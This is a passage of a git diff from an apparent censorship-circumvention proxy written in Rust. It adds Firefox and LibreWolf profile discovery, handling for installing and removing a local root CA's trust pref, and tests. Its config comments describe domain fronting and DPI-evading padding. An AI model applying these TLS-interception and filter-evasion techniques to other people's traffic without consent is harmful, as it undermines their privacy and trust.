         }
         "windows" => {
-            if let Ok(appdata) = std::env::var("APPDATA") {
-                roots.push(PathBuf::from(format!("{}\\Mozilla\\Firefox\\Profiles", appdata)));
+            if let Some(appdata) = appdata {
+                roots.push(PathBuf::from(format!(
+                    "{}\\Mozilla\\Firefox\\Profiles",
+                    appdata
+                )));
+                roots.push(PathBuf::from(format!("{}\\LibreWolf\\Profiles", appdata)));
             }
         }
         _ => {}
     }
+    roots
+}
 
+/// Walk each candidate root and return every immediate child that looks
+/// like a Mozilla NSS profile (has cert9.db or cert8.db). Pure given the
+/// roots — no env access — so tempdir tests can pin the filter without
+/// stubbing HOME/APPDATA. Missing roots silently skip.
+fn discover_profile_dirs(roots: &[PathBuf]) -> Vec<PathBuf> {
     let mut out: Vec<PathBuf> = Vec::new();
-    for root in &roots {
+    for root in roots {
         let Ok(entries) = std::fs::read_dir(root) else {
             continue;
         };
@@ -595,7 +1472,7 @@ fn firefox_profile_dirs() -> Vec<std::path::PathBuf> {
             if !p.is_dir() {
                 continue;
             }
-            // A profile has cert9.db or cert8.db.
+            // A profile has cert9.db (NSS sql:) or cert8.db (legacy dbm:).
             if p.join("cert9.db").exists() || p.join("cert8.db").exists() {
                 out.push(p);
             }
@@ -604,6 +1481,19 @@ fn firefox_profile_dirs() -> Vec<std::path::PathBuf> {
     out
 }
 
+fn mozilla_family_profile_dirs() -> Vec<std::path::PathBuf> {
+    let home = std::env::var("HOME").unwrap_or_default();
+    let appdata = std::env::var("APPDATA").ok();
+    let xdg = std::env::var("XDG_CONFIG_HOME").ok();
+    let roots = mozilla_family_profile_roots(
+        std::env::consts::OS,
+        &home,
+        appdata.as_deref(),
+        xdg.as_deref(),
+    );
+    discover_profile_dirs(&roots)
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -689,4 +1579,462 @@ ID_LIKE=debian
         let content = "SOMEFIELD=maybearchived\nFOO=bar\n";
         assert_eq!(classify_os_release(content), "unknown");
     }
+
+    // ── Firefox user.js block install / uninstall ──
+
+    #[test]
+    fn enterprise_roots_block_added_to_empty_userjs() {
+        let got = add_enterprise_roots_block("");
+        let expected = format!("{}\n{}\n", FX_MARKER, FX_PREF);
+        assert_eq!(got, EnterpriseRootsEdit::AddedBlock(expected));
+    }
+
+    #[test]
+    fn enterprise_roots_block_appended_preserving_existing_prefs() {
+        let existing = "user_pref(\"some.other\", 1);\n";
+        let got = add_enterprise_roots_block(existing);
+        let expected = format!(
+            "user_pref(\"some.other\", 1);\n{}\n{}\n",
+            FX_MARKER, FX_PREF
+        );
+        assert_eq!(got, EnterpriseRootsEdit::AddedBlock(expected));
+    }
+
+    #[test]
+    fn enterprise_roots_block_is_idempotent_when_marker_present() {
+        let existing = format!(
+            "user_pref(\"a\", 1);\n{}\n{}\nuser_pref(\"b\", 2);\n",
+            FX_MARKER, FX_PREF
+        );
+        assert_eq!(
+            add_enterprise_roots_block(&existing),
+            EnterpriseRootsEdit::AlreadyOurs
+        );
+    }
+
+    #[test]
+    fn enterprise_roots_block_respects_user_owned_pref_without_marker() {
+        // User has enterprise_roots set themselves — no marker above it.
+        // We must NOT write our line, and we must NOT claim ownership on
+        // uninstall (tested separately below).
+        let existing = "user_pref(\"security.enterprise_roots.enabled\", true);\n";
+        assert_eq!(
+            add_enterprise_roots_block(existing),
+            EnterpriseRootsEdit::UserOwned
+        );
+    }
+
+    #[test]
+    fn enterprise_roots_block_respects_user_owned_pref_set_to_false() {
+        // User explicitly disabled it — also a user-owned pref, leave alone.
+        let existing = "user_pref(\"security.enterprise_roots.enabled\", false);\n";
+        assert_eq!(
+            add_enterprise_roots_block(existing),
+            EnterpriseRootsEdit::UserOwned
+        );
+    }
+
+    #[test]
+    fn strip_enterprise_roots_removes_our_block_and_preserves_others() {
+        let before = format!(
+            "user_pref(\"a\", 1);\n{}\n{}\nuser_pref(\"b\", 2);\n",
+            FX_MARKER, FX_PREF
+        );
+        let after = strip_enterprise_roots_block(&before).expect("should strip");
+        assert_eq!(after, "user_pref(\"a\", 1);\nuser_pref(\"b\", 2);\n");
+    }
+
+    #[test]
+    fn strip_enterprise_roots_refuses_when_pref_is_bare() {
+        // No marker above — indistinguishable from a user- or
+        // enterprise-policy-authored line. Must return None so caller
+        // leaves user.js untouched. Legacy upgrade users get one
+        // cosmetic orphan line; revoking user-owned Firefox trust
+        // behavior silently is worse.
+        let before = "user_pref(\"security.enterprise_roots.enabled\", true);\n";
+        assert_eq!(strip_enterprise_roots_block(before), None);
+    }
+
+    #[test]
+    fn strip_enterprise_roots_refuses_when_marker_is_elsewhere() {
+        // Marker present but not directly above the pref — user may
+        // have copied our marker line as a comment somewhere else. We
+        // still can't prove ownership of the pref itself, so leave
+        // alone.
+        let before = format!(
+            "{}\nuser_pref(\"unrelated\", 1);\n\
+             user_pref(\"security.enterprise_roots.enabled\", true);\n",
+            FX_MARKER
+        );
+        assert_eq!(strip_enterprise_roots_block(&before), None);
+    }
+
+    #[test]
+    fn strip_enterprise_roots_leaves_user_false_pref_alone() {
+        let before = "user_pref(\"security.enterprise_roots.enabled\", false);\n";
+        assert_eq!(strip_enterprise_roots_block(before), None);
+    }
+
+    #[test]
+    fn strip_enterprise_roots_returns_none_when_pref_absent() {
+        let before = "user_pref(\"other\", 1);\nuser_pref(\"another\", 2);\n";
+        assert_eq!(strip_enterprise_roots_block(before), None);
+    }
+
+    #[test]
+    fn strip_enterprise_roots_roundtrip_from_empty() {
+        // add_block("") -> strip_block(added) -> "" (no trailing garbage).
+        let added = match add_enterprise_roots_block("") {
+            EnterpriseRootsEdit::AddedBlock(s) => s,
+            other => panic!("unexpected: {:?}", other),
+        };
+        let stripped = strip_enterprise_roots_block(&added).expect("should strip");
+        assert_eq!(stripped, "");
+    }
+
+    // ── has_bare_enterprise_roots ──
+
+    #[test]
+    fn bare_enterprise_roots_detected_when_no_marker_present() {
+        let content = "user_pref(\"security.enterprise_roots.enabled\", true);\n";
+        assert!(has_bare_enterprise_roots(content));
+    }
+
+    #[test]
+    fn bare_enterprise_roots_not_detected_when_marker_block_present() {
+        // Our marker+pref block — strip handles this; has_bare_ must
+        // return false so we don't double-warn about a line we own.
+        let content = format!("{}\n{}\n", FX_MARKER, FX_PREF);
+        assert!(!has_bare_enterprise_roots(&content));
+    }
+
+    #[test]
+    fn bare_enterprise_roots_not_detected_when_pref_absent() {
+        let content = "user_pref(\"other\", 1);\n";
+        assert!(!has_bare_enterprise_roots(content));
+    }
+
+    #[test]
+    fn bare_enterprise_roots_ignores_false_variant() {
+        // User explicitly set enterprise_roots = false — not our line
+        // and not the pre-marker legacy write (which only ever wrote
+        // true). No orphan to warn about.
+        let content = "user_pref(\"security.enterprise_roots.enabled\", false);\n";
+        assert!(!has_bare_enterprise_roots(content));
+    }
+
+    // ── should_reconcile_for ──
+
+    #[test]
+    fn reconcile_skipped_for_normal_user() {
+        // euid != 0 — even with SUDO_USER set we must NOT re-root HOME.
+        // A non-root process that happened to inherit SUDO_USER (or
+        // used `sudo -E`) shouldn't get to redirect cert paths.
+        assert_eq!(should_reconcile_for(1000, Some("alice")), None);
+        assert_eq!(should_reconcile_for(1000, None), None);
+    }
+
+    #[test]
+    fn reconcile_skipped_for_real_root_login_without_sudo() {
+        // Load-bearing case the maintainer asked to pin: euid == 0
+        // AND no SUDO_USER means the process is a real root login,
+        // not a sudo elevation. HOME should stay as /root; we must
+        // not try to resolve some other user's home.
+        assert_eq!(should_reconcile_for(0, None), None);
+    }
+
+    #[test]
+    fn reconcile_skipped_when_sudo_user_is_empty_or_root() {
+        assert_eq!(should_reconcile_for(0, Some("")), None);
+        assert_eq!(should_reconcile_for(0, Some("root")), None);
+    }
+
+    #[test]
+    fn reconcile_triggers_for_real_sudo_invocation() {
+        // euid == 0 AND SUDO_USER points to a non-root user — this is
+        // the sudo case we do want to reconcile.
+        assert_eq!(should_reconcile_for(0, Some("alice")), Some("alice"));
+    }
+
+    // ── sudo_parse_passwd_home ──
+
+    #[test]
+    fn parses_debian_passwd_entry() {
+        let line = "liyon:x:1000:1000:Liyon,,,:/home/liyon:/bin/bash\n";
+        assert_eq!(sudo_parse_passwd_home(line), Some("/home/liyon".into()));
+    }
+
+    #[test]
+    fn macos_passwd_format_does_not_parse_and_falls_back_to_convention() {
+        // macOS `dscl`-sourced passwd lines have extra fields
+        // (pw_class, chg, exp) before home, so index 5 lands on a
+        // non-home field. sudo_parse_passwd_home is intentionally
+        // Linux-shaped — the macOS path relies on the `/Users/<user>`
+        // convention in `unix::resolve_home` rather than on this
+        // parser. This test pins that contract.
+        let line = "liyon:*:501:20::0:0:Liyon Bonakdar:/Users/liyon:/bin/zsh";
+        assert_ne!(sudo_parse_passwd_home(line), Some("/Users/liyon".into()));
+    }
+
+    #[test]
+    fn rejects_malformed_passwd_line_too_few_fields() {
+        let line = "liyon:x:1000:1000\n";
+        assert_eq!(sudo_parse_passwd_home(line), None);
+    }
+
+    #[test]
+    fn rejects_empty_home_field() {
+        let line = "svcacct:x:999:999:gecos::/bin/false\n";
+        assert_eq!(sudo_parse_passwd_home(line), None);
+    }
+
+    #[test]
+    fn returns_first_matching_line_when_multiple() {
+        // getent only prints one line, but guard against future change.
+        let content = "liyon:x:1000:1000::/home/liyon:/bin/bash\n\
+                       other:x:1001:1001::/home/other:/bin/bash\n";
+        assert_eq!(sudo_parse_passwd_home(content), Some("/home/liyon".into()));
+    }
+
+    // ── NssReport::is_clean ──
+
+    #[test]
+    fn nss_report_is_clean_when_nothing_tried() {
+        let r = NssReport::default();
+        assert!(r.is_clean());
+    }
+
+    #[test]
+    fn nss_report_is_clean_when_all_attempts_succeeded() {
+        let r = NssReport {
+            tried: 3,
+            ok: 3,
+            tool_missing_with_stores_present: false,
+        };
+        assert!(r.is_clean());
+    }
+
+    #[test]
+    fn nss_report_not_clean_on_partial_failure() {
+        let r = NssReport {
+            tried: 3,
+            ok: 2,
+            tool_missing_with_stores_present: false,
+        };
+        assert!(!r.is_clean());
+    }
+
+    #[test]
+    fn nss_report_not_clean_when_tool_missing_with_stores() {
+        // Even with tried=0 (we couldn't try anything), the presence
+        // of NSS stores plus a missing tool means cleanup is NOT
+        // complete — callers should flag this to the user.
+        let r = NssReport {
+            tried: 0,
+            ok: 0,
+            tool_missing_with_stores_present: true,
+        };
+        assert!(!r.is_clean());
+    }
+
+    // ── is_nss_not_found ──
+
+    #[test]
+    fn nss_not_found_classifies_standard_not_found_message() {
+        // Typical NSS certutil output when the nickname is absent.
+        let stderr = "certutil: Could not find cert: MasterHttpRelayVPN\n";
+        assert!(is_nss_not_found(stderr));
+    }
+
+    #[test]
+    fn nss_not_found_classifies_alt_wording_some_versions_emit() {
+        let stderr = "certutil: could not find a certificate named 'MasterHttpRelayVPN'\n";
+        assert!(is_nss_not_found(stderr));
+    }
+
+    #[test]
+    fn nss_not_found_rejects_locked_database_error() {
+        // Regression guard for the critical bug: DB locked (Firefox
+        // running) must NOT be treated as "cert absent" — that would
+        // silently report clean revocation while NSS keeps trusting
+        // the stale root.
+        let stderr = "certutil: function failed: SEC_ERROR_LOCKED_DATABASE: \
+                      the certificate/key database is locked.\n";
+        assert!(!is_nss_not_found(stderr));
+    }
+
+    #[test]
+    fn nss_not_found_rejects_bad_database_error() {
+        let stderr = "certutil: function failed: SEC_ERROR_BAD_DATABASE: \
+                      security library: bad database.\n";
+        assert!(!is_nss_not_found(stderr));
+    }
+
+    #[test]
+    fn nss_not_found_rejects_permission_error() {
+        let stderr = "certutil: unable to open \"sql:/home/x/.mozilla/firefox/profile\" \
+                      (Permission denied)\n";
+        assert!(!is_nss_not_found(stderr));
+    }
+
+    #[test]
+    fn nss_not_found_rejects_empty_stderr() {
+        // An empty stderr with a non-zero exit is ambiguous — safer
+        // to classify as "not found is NOT proven", i.e. failure.
+        assert!(!is_nss_not_found(""));
+    }
+
+    // ── mozilla_family_profile_roots ──
+    //
+    // Regression guard for issue #1145: LibreWolf users hit
+    // MOZILLA_PKIX_ERROR_MITM_DETECTED on HSTS sites (bing.com,
+    // youtube.com) because the installer only scanned Firefox profile
+    // roots, never reaching LibreWolf's NSS DB. LibreWolf on Linux
+    // additionally migrated from `~/.librewolf` to XDG
+    // (`~/.config/librewolf/librewolf`) mid-project, and Flatpak
+    // installs redirect HOME inside the sandbox — both classes of
+    // install were silently missed by a first-pass legacy-only fix.
+    // These tests pin every layout so regressions can't sneak back.
+
+    #[test]
+    fn mozilla_roots_linux_covers_firefox_librewolf_flatpak_and_icecat() {
+        let roots = mozilla_family_profile_roots("linux", "/home/u", None, None);
+        let s: Vec<String> = roots.iter().map(|p| p.display().to_string()).collect();
+        assert!(s.iter().any(|p| p == "/home/u/.mozilla/firefox"));
+        assert!(s
+            .iter()
+            .any(|p| p == "/home/u/snap/firefox/common/.mozilla/firefox"));
+        // LibreWolf legacy.
+        assert!(s.iter().any(|p| p == "/home/u/.librewolf"));
+        // LibreWolf XDG default (XDG_CONFIG_HOME unset → ~/.config).
+        assert!(s.iter().any(|p| p == "/home/u/.config/librewolf/librewolf"));
+        // LibreWolf Flatpak — both legacy and XDG layouts inside the sandbox.
+        assert!(s
+            .iter()
+            .any(|p| p == "/home/u/.var/app/io.gitlab.librewolf-community/.librewolf"));
+        assert!(s
+            .iter()
+            .any(|p| p
+                == "/home/u/.var/app/io.gitlab.librewolf-community/.config/librewolf/librewolf"));
+        // GNU IceCat (Trisquel / Parabola / Guix / Debian).
+        assert!(s.iter().any(|p| p == "/home/u/.mozilla/icecat"));
+    }
+
+    #[test]
+    fn mozilla_roots_linux_honors_xdg_config_home_override() {
+        // When XDG_CONFIG_HOME is set we must use it verbatim, not
+        // ~/.config. Pinned because a refactor that always defaulted
+        // would silently miss profiles for users who relocate their
+        // XDG config dir.
+        let roots = mozilla_family_profile_roots("linux", "/home/u", None, Some("/srv/xdg"));
+        let s: Vec<String> = roots.iter().map(|p| p.display().to_string()).collect();
+        assert!(s.iter().any(|p| p == "/srv/xdg/librewolf/librewolf"));
+        // Default-derived path must NOT also be emitted when override
+        // is present — otherwise we double-scan a path that no longer
+        // exists for this user.
+        assert!(!s.iter().any(|p| p == "/home/u/.config/librewolf/librewolf"));
+    }
+
+    #[test]
+    fn mozilla_roots_linux_treats_empty_xdg_config_home_as_unset() {
+        // Per the XDG Base Directory spec, an empty value means
+        // "fall back to the default" — same as if the variable were
+        // unset entirely.
+        let roots = mozilla_family_profile_roots("linux", "/home/u", None, Some(""));
+        let s: Vec<String> = roots.iter().map(|p| p.display().to_string()).collect();
+        assert!(s.iter().any(|p| p == "/home/u/.config/librewolf/librewolf"));
+    }
+
+    #[test]
+    fn mozilla_roots_macos_covers_firefox_and_librewolf() {
+        let roots = mozilla_family_profile_roots("macos", "/Users/u", None, None);
+        let s: Vec<String> = roots.iter().map(|p| p.display().to_string()).collect();
+        assert!(s
+            .iter()
+            .any(|p| p == "/Users/u/Library/Application Support/Firefox/Profiles"));
+        assert!(s
+            .iter()
+            .any(|p| p == "/Users/u/Library/Application Support/LibreWolf/Profiles"));
+    }
+
+    #[test]
+    fn mozilla_roots_windows_covers_firefox_and_librewolf() {
+        let roots = mozilla_family_profile_roots(
+            "windows",
+            "ignored",
+            Some("C:\\Users\\u\\AppData\\Roaming"),
+            None,
+        );
+        let s: Vec<String> = roots.iter().map(|p| p.display().to_string()).collect();
+        assert!(s
+            .iter()
+            .any(|p| p == "C:\\Users\\u\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"));
+        assert!(s
+            .iter()
+            .any(|p| p == "C:\\Users\\u\\AppData\\Roaming\\LibreWolf\\Profiles"));
+    }
+
+    #[test]
+    fn mozilla_roots_windows_without_appdata_yields_nothing() {
+        // %APPDATA% can be missing in stripped CI / service contexts.
+        // Existing behaviour was to no-op; LibreWolf addition must not
+        // panic or fabricate a path from an empty string either.
+        let roots = mozilla_family_profile_roots("windows", "ignored", None, None);
+        assert!(roots.is_empty());
+    }
+
+    #[test]
+    fn mozilla_roots_unknown_os_is_empty() {
+        let roots = mozilla_family_profile_roots("freebsd", "/home/u", None, None);
+        assert!(roots.is_empty());
+    }
+
+    // ── discover_profile_dirs (cert-db filter) ──
+
+    fn touch(path: &Path) {
+        std::fs::write(path, b"").expect("write");
+    }
+
+    #[test]
+    fn discover_profile_dirs_picks_profiles_with_cert9_or_cert8() {
+        // Build a tempdir that mimics the real Mozilla profile layout
+        // and assert the filter accepts cert9.db (NSS sql:) and
+        // cert8.db (legacy dbm:) profiles, skips siblings that have
+        // neither, ignores plain files, and tolerates missing roots.
+        let tmp = std::env::temp_dir().join(format!(
+            "mhrv-discover-{}-{:x}",
+            std::process::id(),
+            std::time::SystemTime::now()
+                .duration_since(std::time::UNIX_EPOCH)
+                .map(|d| d.as_nanos())
+                .unwrap_or(0)
+        ));
+        let _ = std::fs::remove_dir_all(&tmp);
+        std::fs::create_dir_all(&tmp).expect("mkdir tmp");
+
+        let with_cert9 = tmp.join("abc.default");
+        let with_cert8 = tmp.join("legacy.profile");
+        let without_db = tmp.join("not-a-profile");
+        let stray_file = tmp.join("profiles.ini");
+        std::fs::create_dir_all(&with_cert9).unwrap();
+        std::fs::create_dir_all(&with_cert8).unwrap();
+        std::fs::create_dir_all(&without_db).unwrap();
+        touch(&with_cert9.join("cert9.db"));
+        touch(&with_cert8.join("cert8.db"));
+        touch(&stray_file);
+
+        let missing_root = tmp.join("does-not-exist");
+        let got = discover_profile_dirs(&[tmp.clone(), missing_root]);
+
+        let names: std::collections::HashSet<_> = got
+            .iter()
+            .map(|p| p.file_name().unwrap().to_string_lossy().into_owned())
+            .collect();
+        assert!(names.contains("abc.default"));
+        assert!(names.contains("legacy.profile"));
+        assert!(!names.contains("not-a-profile"));
+        assert!(!names.contains("profiles.ini"));
+
+        let _ = std::fs::remove_dir_all(&tmp);
+    }
 }
diff --git a/src/config.rs b/src/config.rs
index 74d08155..d4251aa8 100644
--- a/src/config.rs
+++ b/src/config.rs
@@ -1,4 +1,5 @@
-use serde::Deserialize;
+use rustls::pki_types::ServerName;
+use serde::{Deserialize, Serialize};
 use std::collections::HashMap;
 use std::path::Path;
 
@@ -14,14 +15,19 @@ pub enum ConfigError {
 
 /// Operating mode. `AppsScript` is the full client — MITMs TLS locally and
 /// relays HTTP/HTTPS through a user-deployed Apps Script endpoint.
-/// `GoogleOnly` is a bootstrap: no relay, no Apps Script config needed,
-/// only the SNI-rewrite tunnel to the Google edge is active. Intended for
-/// users who need to reach `script.google.com` to deploy `Code.gs` in the
-/// first place.
+/// `Direct` runs without any Apps Script relay: only the SNI-rewrite tunnel
+/// is active, targeting the Google edge by default plus any user-configured
+/// `fronting_groups`. Originally introduced as a `script.google.com`
+/// bootstrap (when this mode could only reach Google's edge it was named
+/// `google_only`), now generalized to any user-configured CDN edge.
 #[derive(Debug, Clone, Copy, PartialEq, Eq)]
 pub enum Mode {
     AppsScript,
-    GoogleOnly,
+    /// Was named `GoogleOnly` before v1.9 and the introduction of
+    /// `fronting_groups`. The string `"google_only"` is still accepted
+    /// in `mode_kind()` as a deprecated alias so existing configs do
+    /// not break.
+    Direct,
     Full,
 }
 
@@ -29,7 +35,7 @@ impl Mode {
     pub fn as_str(self) -> &'static str {
         match self {
             Mode::AppsScript => "apps_script",
-            Mode::GoogleOnly => "google_only",
+            Mode::Direct => "direct",
             Mode::Full => "full",
         }
     }
@@ -96,6 +102,14 @@ pub struct Config {
     /// script IDs.
     #[serde(default)]
     pub parallel_relay: u8,
+    /// Adaptive batch coalesce: after each op arrives, wait this many ms
+    /// for more ops before firing the batch. Resets on every arrival.
+    /// 0 = use compiled default (10ms).
+    #[serde(default)]
+    pub coalesce_step_ms: u16,
+    /// Hard cap on total coalesce wait (ms). 0 = use compiled default (1000ms).
+    #[serde(default)]
+    pub coalesce_max_ms: u16,
     /// Optional explicit SNI rotation pool for outbound TLS to `google_ip`.
     /// Empty / missing = auto-expand from `front_domain` (current default of
     /// {www, mail, drive, docs, calendar}.google.com). Set to an explicit list
@@ -163,6 +177,315 @@ pub struct Config {
     /// Issues #39, #127.
     #[serde(default)]
     pub passthrough_hosts: Vec<String>,
+
+    /// Block outbound QUIC (UDP/443) at the SOCKS5 listener.
+    ///
+    /// QUIC is HTTP/3-over-UDP. In `apps_script` mode it's hopeless —
+    /// Apps Script is HTTP-only, so QUIC datagrams either get refused
+    /// outright (UDP ASSOCIATE rejected) or silently fall through to
+    /// `raw-tcp direct` and fail in interesting ways. In `full` mode
+    /// the tunnel-node CAN carry UDP, but QUIC's congestion control
+    /// stacked on top of TCP-encapsulated transport produces TCP
+    /// meltdown for any non-trivial bandwidth — browsers see <1 Mbps
+    /// where the same site over plain HTTPS would do >50.
+    ///
+    /// With `block_quic = true`, the SOCKS5 UDP relay drops any
+    /// datagram destined for port 443 (silent UDP — caller's stack
+    /// retries a few times then falls back). Browsers then re-issue
+    /// the same request as TCP/HTTPS through the regular CONNECT
+    /// path, which goes through the relay normally.
+    ///
+    /// Why this is opt-in rather than always-on: for users on Full
+    /// mode + udpgw (a recent path; v1.7.0+) the QUIC TCP-meltdown
+    /// is partially mitigated by udpgw's persistent-socket reuse,
+    /// and a tiny minority of sites only support HTTP/3 (rare). The
+    /// flag lets users who care about consistency over peak speed
+    /// opt out of QUIC at the source rather than discovering its
+    /// failure modes later. Issue #213.
+    /// Block STUN/TURN UDP ports (3478, 5349, 19302) at the SOCKS5 listener.
+    /// Forces WebRTC apps (Google Meet, Discord, WhatsApp) to fall back to
+    /// TCP TURN on port 443, skipping the 10-30s UDP ICE timeout. Default
+    /// true — TCP fallback works for all tested apps and connects instantly.
+    #[serde(default = "default_block_stun")]
+    pub block_stun: bool,
+
+    #[serde(default = "default_block_quic")]
+    pub block_quic: bool,
+    /// When true, suppress the random `_pad` field that v1.8.0+ adds
+    /// to outbound Apps Script requests for DPI evasion. Default off
+    /// (padding active). Some users on heavily-throttled ISPs find
+    /// the +25% bandwidth cost from padding compounds with the
+    /// throttle to push borderline-working batches into timeouts;
+    /// turning padding off recovers a bit of headroom at the cost of
+    /// length-distribution defense against DPI fingerprinting. Issue
+    /// #391 (EBRAHIM-AM).
+    ///
+    /// Don't flip this on speculatively — for users where Apps Script
+    /// outbound is uncongested, padding is free DPI defense. Only
+    /// turn off if you've measured throughput improvement after the
+    /// flip on your specific ISP path.
+    #[serde(default)]
+    pub disable_padding: bool,
+
+    /// Disable HTTP/2 multiplexing on the Apps Script relay leg.
+    /// Default `false` (= h2 enabled): the TLS handshake to the Google
+    /// edge advertises ALPN `["h2", "http/1.1"]`; if the server picks
+    /// h2 we route all relay traffic over a single multiplexed
+    /// connection (~100 concurrent streams) instead of the legacy
+    /// per-request TLS pool of 8-80 sockets. Kills head-of-line
+    /// blocking on slow Apps Script responses (one stalled call no
+    /// longer pins a whole socket). Set to `true` to force the
+    /// pre-v1.9.x HTTP/1.1 path — useful as a kill switch if a specific
+    /// deployment, fronting domain, or middlebox refuses h2.
+    #[serde(default)]
+    pub force_http1: bool,
+
+    /// Opt-out for the DoH bypass. Default `false` (= bypass active):
+    /// CONNECTs to well-known DoH hostnames (Cloudflare, Google, Quad9,
+    /// AdGuard, NextDNS, OpenDNS, browser-pinned variants like
+    /// `chrome.cloudflare-dns.com` and `mozilla.cloudflare-dns.com`)
+    /// skip the Apps Script tunnel and exit via plain TCP (or
+    /// `upstream_socks5` if set). DoH already encrypts the queries
+    /// themselves, so the only privacy property the tunnel was adding
+    /// is hiding *the fact that you're doing DoH* from the local
+    /// network — a marginal gain not worth the ~2 s Apps Script
+    /// round-trip cost paid on every name lookup. In Full mode this
+    /// was the dominant DNS slowdown source.
+    ///
+    /// Set `tunnel_doh: false` to enable the bypass and let DoH go
+    /// direct (saves the ~2 s Apps Script round-trip per name on
+    /// networks where the DoH endpoints are reachable). With the
+    /// bypass off, browsers that find their pinned DoH host
+    /// unreachable already fall back to OS DNS on their own, so
+    /// failure modes are graceful in either direction.
+    ///
+    /// **Default flipped to `true` in v1.9.0** (issue #468). The
+    /// previous default (`false` = bypass active) silently broke for
+    /// Iranian users because Iran ISPs filter direct connections to
+    /// `dns.google`, `chrome.cloudflare-dns.com`, etc. — exactly the
+    /// "pinned DoH" hosts that the bypass was sending through. The
+    /// safe default keeps DoH inside the tunnel; users on networks
+    /// where direct DoH works can opt back into the bypass.
+    ///
+    /// Port-gated to TCP/443 only. A private DoH on a non-standard port
+    /// (e.g. `doh.internal.example:8443`) won't take the bypass path —
+    /// list it in `passthrough_hosts` instead, which has no port gate.
+    #[serde(default = "default_tunnel_doh")]
+    pub tunnel_doh: bool,
+
+    /// Extra hostnames to treat as DoH endpoints in addition to the
+    /// built-in default list. Case-insensitive; entries match exactly
+    /// OR as a dot-anchored suffix unconditionally — `doh.acme.test`
+    /// covers both `doh.acme.test` and `tenant.doh.acme.test`. (Unlike
+    /// `passthrough_hosts`, no leading dot is required for suffix
+    /// matching: every legitimate subdomain of a DoH host is itself
+    /// a DoH endpoint, so the leading-dot convention would be a
+    /// footgun.) Use this to cover private/enterprise DoH resolvers
+    /// without waiting for a release.
+    ///
+    /// Inert when `tunnel_doh = true` — the bypass itself is off, so
+    /// the extras have nothing to feed. The proxy logs a warning at
+    /// startup if both are set together.
+    #[serde(default)]
+    pub bypass_doh_hosts: Vec<String>,
+
+    /// When true, immediately reject (close) any CONNECT to a known DoH
+    /// endpoint. Takes priority over `tunnel_doh` — the connection is
+    /// never established in either direction. Browsers fall back to system
+    /// DNS, which tun2proxy handles via virtual DNS (instant, no tunnel
+    /// round-trip). This eliminates the ~1.5s per-domain DoH overhead
+    /// that #468's `tunnel_doh: true` default introduced.
+    ///
+    /// Background: #468 changed `tunnel_doh` from false (bypass) to true
+    /// (tunnel) because Iranian ISPs block direct DoH endpoints. But
+    /// tunneling DoH costs an extra ~1.5s Apps Script round-trip per DNS
+    /// lookup, which made every page load noticeably slower. Blocking
+    /// DoH entirely avoids both problems: no ISP-visible DoH connection,
+    /// no tunnel round-trip — browsers use the system DNS path instead.
+    ///
+    /// Default `true` (NOT `bool::default() = false`). Critical for
+    /// upgrading users — see #773: with the v1.9.13 default-derive bug,
+    /// existing configs got `block_doh = false` paired with `tunnel_doh
+    /// = true` (the new tunnel-DoH default from #468), routing every
+    /// browser DNS lookup through Apps Script and adding ~1.5s per page
+    /// load. The named-default function fixes the upgrade path so the
+    /// fast block-then-system-DNS behaviour is what users actually get.
+    #[serde(default = "default_block_doh")]
+    pub block_doh: bool,
+
+    /// Multi-edge domain-fronting groups. Each group is a triple of
+    /// (edge IP, front SNI, member domains): when a CONNECT to one of
+    /// the member domains arrives, the proxy MITMs at the local CA
+    /// then re-encrypts upstream against `ip` with `sni` as the TLS
+    /// SNI — same trick we already do for `google_ip` + `front_domain`,
+    /// but generalised so users can target Vercel's edge (sni=react.dev,
+    /// fronting vercel.com / vercel.app / nextjs.org / ...) or Fastly's
+    /// (sni=www.python.org, fronting reddit.com / githubassets.com / ...)
+    /// directly without burning Apps Script quota or relying on the
+    /// Google edge for non-Google traffic.
+    ///
+    /// The cert returned by the upstream is validated against `sni` by
+    /// rustls as normal — no custom SAN-allowlist needed, the front SNI
+    /// must itself be a real domain hosted by the same edge as the
+    /// targets. Picking the right (ip, sni) pair is on the user; see
+    /// `docs/fronting-groups.md` for the recipe.
+    ///
+    /// Group match wins over the built-in Google SNI-rewrite suffix list
+    /// but loses to `passthrough_hosts` (explicit user opt-out wins) and
+    /// to the DoH bypass. Empty / missing = feature off.
+    #[serde(default)]
+    pub fronting_groups: Vec<FrontingGroup>,
+
+    /// Auto-blacklist tuning — how many timeouts within the window
+    /// trip a per-deployment cooldown.
+    ///
+    /// Default `3` matches the historical behavior. Single-deployment
+    /// users who hit transient network blips have reported (#391, #444)
+    /// that 3 strikes are too few — one cold-start stall plus two
+    /// network glitches lock out their only relay path. Bumping to
+    /// `5` or `6` is a reasonable workaround for that case.
+    ///
+    /// Multi-deployment users with 10+ healthy alternatives can lower
+    /// this (e.g. `2`) to fail-fast off a flaky deployment without
+    /// burning latency on retries.
+    #[serde(default = "default_auto_blacklist_strikes")]
+    pub auto_blacklist_strikes: u32,
+
+    /// Window (seconds) for the auto-blacklist strike counter. Strikes
+    /// older than this are dropped. Default `30`. Larger windows make
+    /// the heuristic less twitchy at the cost of holding state longer
+    /// for deployments that have already recovered.
+    #[serde(default = "default_auto_blacklist_window_secs")]
+    pub auto_blacklist_window_secs: u64,
+
+    /// Cooldown (seconds) when the strike threshold trips. Default
+    /// `120`. Single-deployment users who can't afford a 2-min lockout
+    /// when their only relay misbehaves can drop to `30` or `60`. Multi-
+    /// deployment users with healthy alternatives can extend to `600`
+    /// to keep a known-bad deployment out of rotation longer.
+    #[serde(default = "default_auto_blacklist_cooldown_secs")]
+    pub auto_blacklist_cooldown_secs: u64,
+
+    /// Per-batch HTTP round-trip timeout (seconds). Default `30` —
+    /// matches Apps Script's typical response cliff and historical
+    /// `BATCH_TIMEOUT` constant. Slow Iran ISP networks may want `45`
+    /// or `60` to give Apps Script time to respond past throttle
+    /// windows. Networks with fail-fast preference may want `15` to
+    /// retry sooner when a deployment hangs. Floor `5`, ceiling `300`
+    /// (anything beyond exceeds Apps Script's hard 6-min cap with
+    /// no benefit).
+    #[serde(default = "default_request_timeout_secs")]
+    pub request_timeout_secs: u64,
+
+    /// Optional second-hop exit node, for sites that block traffic
+    /// from Google datacenter IPs (Apps Script's outbound IP space).
+    /// Most visibly: Cloudflare-fronted services that flag the GCP IP
+    /// block as bots — ChatGPT (chatgpt.com), Claude (claude.ai),
+    /// Grok (grok.com / x.com), and a long tail of CF-protected SaaS.
+    ///
+    /// Architecture: chain becomes
+    ///   `client → SNI rewrite → Apps Script (Google IP) → exit node
